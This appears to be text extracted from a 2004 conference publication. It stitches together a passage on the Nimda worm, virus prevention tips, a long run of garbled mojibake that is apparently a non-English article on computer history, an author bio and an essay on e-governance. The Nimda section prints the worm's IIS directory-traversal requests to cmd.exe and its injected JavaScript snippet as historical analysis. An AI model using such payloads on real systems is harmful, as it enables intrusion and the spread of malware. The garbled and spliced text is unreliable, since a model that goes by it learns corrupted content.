GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 13: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

